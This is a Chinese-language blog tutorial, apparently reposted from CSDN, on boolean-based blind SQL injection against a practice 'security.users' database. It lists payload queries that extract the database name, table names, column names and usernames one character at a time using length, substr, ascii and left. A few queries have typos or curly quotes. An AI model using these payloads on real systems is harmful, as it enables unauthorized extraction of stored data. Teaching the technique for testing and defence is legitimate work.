SQL注入-布尔盲注

标签：users 盲注 name SQL schema where id select 布尔

适用场景

适用于页面没有回显字段，只返回Ture和Flase

注入流程

求当前数据库长度 求当前数据库表的ASCII 求当前数据库中表的个数 求当前数据库中其中一个表名的长度 求当前数据库中其中一个表名的ASCII 求列名的数量 求列名的长度 求列名的ASCII 求字段的数量 求字段内容的长度 求字段内容对应的ASCII

SQL查询语句

求当前数据库长度

思路: 利用length()或substr()函数

select * from users where id =1 and length(database()>8);
#灵活利用>=<符号来判断数据库 
select * from users where id = 1 and ascii(substr(database(),8,1));
#当substr截取的字符串不存在时会返回false

求当前数据库名

思路:利用left()或substr()函数

select * from users where id=1 and (left(database(),2)='se');
#从左至右截取进行判断
select * from users where id=1 and ascii(substr(database(),1,1))=ascii('s')
#截取字符的ascii码值进行判断，可以利用><号缩小范围  

求当前数据库中表的个数

select * from users where id=1 and (select count(*) from information_schema.tables where table_schema=database())>3;

求当前数据库中某一个表名的长度

select * from users where id=1 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6;

select * from users where id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))

求当前数据库中其中一个表名的ASCII

select * from users where id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = ascii('e')

求列名数量

select * from users where id =1 and (select count(column_name) from information_schema.columns where table_name = "users")=8

求列名长度

select * from users where id =1 and length((select column_name from information_schema.columns where table_name = "users" limit 0,1))=4

select * from users where id =1 and ascii(substr((select column_name from information_schema.columns where table_name = “users” limit 0,1),4,1))

求列名的ASCII

select * from users where id =1 and ascii(substr((select column_name from information_schema.columns where table_name = "users" limit 0,1),1,1))=ascii('U')

select * from users where id =1 and left((select column_name from information_schema.columns where table_name = “users” limit 0,1),1)=‘U’

求字段的数量

select * from users where id =1 and (SELECT count(username) FROM security.users)=13;

求字段内容的长度

select * from users where id =1 and length((SELECT username FROM security.users limit 0,1))=4;

select * from users where id =1 and ascii(substr((SELECT username FROM security.users limit 0,1),4,1));

求字段内容

select * from users where id =1 and ascii(substr((SELECT username FROM security.users limit 0,1),1,1))=ascii('D');

select * from users where id =1 and left((SELECT username FROM security.users limit 0,1),1)=‘D’;

标签：users,盲注,name,SQL,schema,where,id,select,布尔
From： https://blog.csdn.net/qq_40876028/article/details/139736957